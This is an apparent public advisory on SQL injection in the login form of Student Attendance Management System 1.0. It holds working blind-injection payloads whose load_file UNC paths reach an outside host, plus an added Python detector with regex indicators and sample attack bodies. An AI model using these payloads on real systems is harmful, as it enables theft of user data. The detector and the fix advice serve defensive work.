Student Attendance Management System 1.0 SQL Injection
Student Attendance Management System version 1.0 from Erick O. Omundi suffers from multiple remote SQL injection vulnerabilities.
## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi
## Author: nu11secur1ty
## Date: 12.25.2022
## Vendor: https://github.com/rickxy
## Software: https://github.com/rickxy/Student-Attendance-Management-System
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System

## Description:
The `username` parameter appears to be vulnerable to multiple SQL injection attacks.
An attacker can retrieve all sensitive information about the users of this system, and do further damage.

## STATUS: CRITICAL Vulnerability

[+] Payload:

```MySQL
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: userType=Administrator&username=lBPxXeUT'+(selectload_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(selectload_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+''ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: userType=Administrator&username=lBPxXeUT'+(selectload_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND'XFcq'='XFcq&password=q2H!z4n!F1&login=Login
---
```

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System

## Proof and Exploit:
[href](https://streamable.com/goy6ka)

## Time spent
`00:30:00`
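
For defenders reviewing login traffic to this application, the following added example (not part of the original advisory or of the project's code) flags the markers visible in the two payload types above: a time delay, `load_file`, the RLIKE/CASE boolean probe, hex literals and UNC paths, including a UNC path hidden inside a hex literal. The function name, indicator names and sample request bodies are constructed for illustration; the host `oob.example.invalid` is a placeholder.

```python
import re
from urllib.parse import parse_qs

# Hex literal such as 0x6c42...; the captured group is the digits only.
HEX = re.compile(r"\b0x((?:[0-9a-f]{2}){4,})\b", re.I)

# Indicator names are this example's own; patterns follow the advisory's payloads.
INDICATORS = {
    "time_delay": re.compile(r"\bsleep\s*\(", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "boolean_probe": re.compile(r"\brlike\b|\bcase\s+when\b", re.I),
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "hex_literal": HEX,
    "unc_path": re.compile(r"\\{2,}[\w.-]+"),  # \\host\share style path
}

def inspect_login_body(body, field="username"):
    """Return sorted indicator names found in one form-encoded POST field."""
    hits = set()
    for value in parse_qs(body, keep_blank_values=True).get(field, []):
        texts = [value]
        # Also scan what each hex literal decodes to (e.g. an encoded UNC path).
        for digits in HEX.findall(value):
            try:
                texts.append(bytes.fromhex(digits).decode("latin-1"))
            except ValueError:
                pass
        for text in texts:
            hits.update(n for n, rx in INDICATORS.items() if rx.search(text))
    return sorted(hits)

# Constructed sample request bodies (not captured traffic).
SAMPLES = [
    "userType=Administrator&username=admin&password=secret&login=Login",
    "userType=Administrator&username=o'brien&password=secret&login=Login",
    "userType=Administrator&username=x'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)"
    "+AND+'a'='a&password=p&login=Login",
    "userType=Administrator&username=x'+(select+load_file("
    "'%5C%5C%5C%5Coob.example.invalid%5C%5Ca'))+''+RLIKE+(SELECT+(CASE+WHEN+(1=1)"
    "+THEN+0x6c42507858655554+ELSE+0x28+END))+AND+'a'='a&password=p&login=Login",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_login_body(body) or "clean", "<-", body[:60])
```

Matching on these markers is a triage aid for logs or a WAF rule; the fix for the application itself is to bind `username` as a parameter in a prepared statement instead of concatenating it into the query.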